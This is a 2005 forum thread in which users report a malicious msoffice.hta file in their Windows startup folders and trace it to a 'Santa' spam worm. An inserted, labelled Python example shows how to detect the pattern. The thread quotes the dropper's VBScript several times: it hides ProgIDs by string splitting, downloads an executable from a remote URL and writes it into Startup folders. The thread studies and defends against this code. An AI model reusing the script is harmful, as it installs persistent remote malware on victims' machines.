funny files in startup folder

Cyber-Hun (Guest)
Posted: Sat Jan 01, 2005 8:54 pm    Post subject: funny files in startup folder

I found a couple strange little files in my startup folder
( C:\Documents and Settings\All Users\Start Menu\Programs),
one file was called msoffice.hta, and the other was officeOSA.exe (0 bytes).
My scanners (TCMonitor, TCActive) aren't triggered by these files, but I'm
pretty suspicious, given that the .hta file contained the following:
-------------------
set o = CreateObject("m"+"sxml2.XML"+"HTTP") :
o.open "GET","http://paddy.home.comcast.net/xp.exe",False :
o.send :
set s = createobject("ad"+"odb"+".stre"+"am") :
s.type=1 :
s.open :
s.write o.responseBody :
s.savetofile "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\OfficeOSA.exe",2 :
s.savetofile "C:\Dokumente und Einstellungen\All Users\Startmenu\Programme\Autostart\OfficeOSA.exe",2 :
window.self.close() :
--------------------------
I'm not fluent in vbscript, but doesn't this code get stuff from that
comcast url, and then put it in these files that it creates in the startup
folder?
Presumably it's supposed to run the 'stuff' it fetched from the comcast URL,
whatever it is, every time I reboot. Doesn't just the fact that this has
occurred at all indicate a breach? I don't know if I should be alarmed or
not, my scanners show me all the other places where malicious files can be
put where they will be automatically run (runonce, runservices, etc) and
there is nothing else there.
Can anyone fill me in on this, or relate similar occurrences?
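
An added example, not part of the original post or thread: a small static check, in Python, for the pattern the quoted .hta shows (ProgIDs split across string concatenations, an HTTP fetch, and a binary write into a Startup folder). The function names, finding labels and the SAMPLE constant are assumptions made for this illustration; SAMPLE is the script from the post with its wrapped paths rejoined.

```python
import re

# Sample input: the script quoted in the post, wrapped paths rejoined.
SAMPLE = r'''set o = CreateObject("m"+"sxml2.XML"+"HTTP") :
o.open "GET","http://paddy.home.comcast.net/xp.exe",False :
o.send :
set s = createobject("ad"+"odb"+".stre"+"am") :
s.type=1 :
s.open :
s.write o.responseBody :
s.savetofile "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\OfficeOSA.exe",2 :
s.savetofile "C:\Dokumente und Einstellungen\All Users\Startmenu\Programme\Autostart\OfficeOSA.exe",2 :
window.self.close() :'''

# Startup-folder path fragments (English and German, as seen in the post).
STARTUP = (r"\start menu\programs\startup", r"\startmenu\programme\autostart")

def fold_concat(script):
    """Collapse "a"+"b" (or "a" & "b") literals into "ab" until stable."""
    prev = None
    while prev != script:
        prev = script
        script = re.sub(r'"([^"]*)"\s*[+&]\s*"([^"]*)"', r'"\1\2"', script)
    return script

def analyze(script):
    """Return findings for a download-and-drop script (hypothetical labels)."""
    flat = fold_concat(script)
    progids = [p.lower() for p in
               re.findall(r'createobject\(\s*"([^"]+)"', flat, re.I)]
    urls = re.findall(r'"(https?://[^"]+)"', flat, re.I)
    drops = re.findall(r'\.savetofile\s+"([^"]+)"', flat, re.I)
    findings = []
    if any("xmlhttp" in p for p in progids) and urls:
        findings.append("http-download")
    if "adodb.stream" in progids and drops:
        findings.append("binary-file-write")
    if any(f in d.lower() for d in drops for f in STARTUP):
        findings.append("startup-persistence")
    # A ProgID that only appears after folding was split to dodge string scans.
    hidden = [p for p in progids if p not in script.lower()]
    if hidden:
        findings.append("split-progid")
    return {"findings": findings, "urls": urls,
            "drops": drops, "hidden_progids": hidden}
```
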

Dave (Guest)
Posted: Sat Jan 01, 2005 9:58 pm    Post subject: Re: funny files in startup folder

yep, funny for sure... that was apparently part of that 'santa like you have
never seen him before' spam from some kind of virus/worm. start scanning,
and keep scanning until you find it. spybot, adaware, hijackthis, etc, etc,
etc...

"Cyber-Hun" <th54@hotmail.com> wrote in message
news:GIzBd.664937$%k.4763@pd7tw2no...
Quote:
I found a couple strange little files in my startup folder
( C:\Documents and Settings\All Users\Start Menu\Programs),
one file was called msoffice.hta, and the other was officeOSA.exe (0 bytes).
My scanners (TCMonitor, TCActive) aren't triggered by these files, but I'm
pretty suspicious, given that the .hta file contained the following:
-------------------
set o = CreateObject("m"+"sxml2.XML"+"HTTP") :
o.open "GET","http://paddy.home.comcast.net/xp.exe",False :
o.send :
set s = createobject("ad"+"odb"+".stre"+"am") :
s.type=1 :
s.open :
s.write o.responseBody :
s.savetofile "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\OfficeOSA.exe",2 :
s.savetofile "C:\Dokumente und Einstellungen\All Users\Startmenu\Programme\Autostart\OfficeOSA.exe",2 :
window.self.close() :
--------------------------
I'm not fluent in vbscript, but doesn't this code get stuff from that
comcast url, and then put it in these files that it creates in the startup
folder?
Presumably it's supposed to run the 'stuff' it fetched from the comcast URL,
whatever it is, every time I reboot. Doesn't just the fact that this has
occurred at all indicate a breach? I don't know if I should be alarmed or
not, my scanners show me all the other places where malicious files can be
put where they will be automatically run (runonce, runservices, etc) and
there is nothing else there.
Can anyone fill me in on this, or relate similar occurrences?

RustYŠ (Guest)
Posted: Sat Jan 01, 2005 10:18 pm    Post subject: Re: funny files in startup folder

"Cyber-Hun" <th54@hotmail.com> wrote in message
news:GIzBd.664937$%k.4763@pd7tw2no...
Quote:
I found a couple strange little files in my startup folder
( C:\Documents and Settings\All Users\Start Menu\Programs),
one file was called msoffice.hta, and the other was officeOSA.exe (0 bytes).
My scanners (TCMonitor, TCActive) aren't triggered by these files, but I'm
pretty suspicious, given that the .hta file contained the following:

I have that too.

It has now stopped me from using any anti-virus tools. Anything with virus
in the title and the window is closed !

I can't even search the net for a remedy - this is going to cause me some
trouble.

Cyber-Hun (Guest)
Posted: Sat Jan 01, 2005 10:28 pm    Post subject: Re: funny files in startup folder

I posted this in the comp.virus group, and apparently it's an exploit called
bloodhound 21 or something and it was caused by that post; "Santa like you
have never seen before".

"RustYŠ" <RustY@Fishing.net> wrote in message
news:RXABd.310$6W3.279@newsfe3-win.ntli.net...
Quote:

"Cyber-Hun" <th54@hotmail.com> wrote in message
news:GIzBd.664937$%k.4763@pd7tw2no...
I found a couple strange little files in my startup folder
( C:\Documents and Settings\All Users\Start Menu\Programs),
one file was called msoffice.hta, and the other was officeOSA.exe (0 bytes).
My scanners (TCMonitor, TCActive) aren't triggered by these files, but I'm
pretty suspicious, given that the .hta file contained the following:

I have that too.

It has now stopped me from using any anti-virus tools. Anything with virus
in the title and the window is closed !

I can't even search the net for a remedy - this is going to cause me some
trouble.


RustYŠ (Guest)
Posted: Sat Jan 01, 2005 10:35 pm    Post subject: Re: funny files in startup folder

"Cyber-Hun" <th54@hotmail.com> wrote in message
news:j5BBd.666036$%k.275591@pd7tw2no...
Quote:
I posted this in the comp.virus group, and apparently it's an exploit called
bloodhound 21 or something and it was caused by that post; "Santa like you
have never seen before".

Guess what - I looked at that !!!

It was in a binaries group that I visit and I thought it was a picture of an
aeroplane ! ( Silly Bunt!!)

Thanks for that I'll keep looking..

Cyber-Hun (Guest)
Posted: Sat Jan 01, 2005 10:42 pm    Post subject: Re: funny files in startup folder

I'm not an expert in this field, but it sounds like you need a thorough
cleanup, amigo --- safe mode, roll-back, and all of that. I've learned my
lesson, I'm de-activating all my scripting and activex stuff, and maybe
switching to firefox.
Good luck, and keep us posted on your progress. btw happy new years!

"RustYŠ" <RustY@Fishing.net> wrote in message
news:0cBBd.320$6W3.167@newsfe3-win.ntli.net...
Quote:

"Cyber-Hun" <th54@hotmail.com> wrote in message
news:j5BBd.666036$%k.275591@pd7tw2no...
I posted this in the comp.virus group, and apparently it's an exploit called
bloodhound 21 or something and it was caused by that post; "Santa like you
have never seen before".

Guess what - I looked at that !!!

It was in a binaries group that I visit and I thought it was a picture of an
aeroplane ! ( Silly Bunt!!)

Thanks for that I'll keep looking..

All times are GMT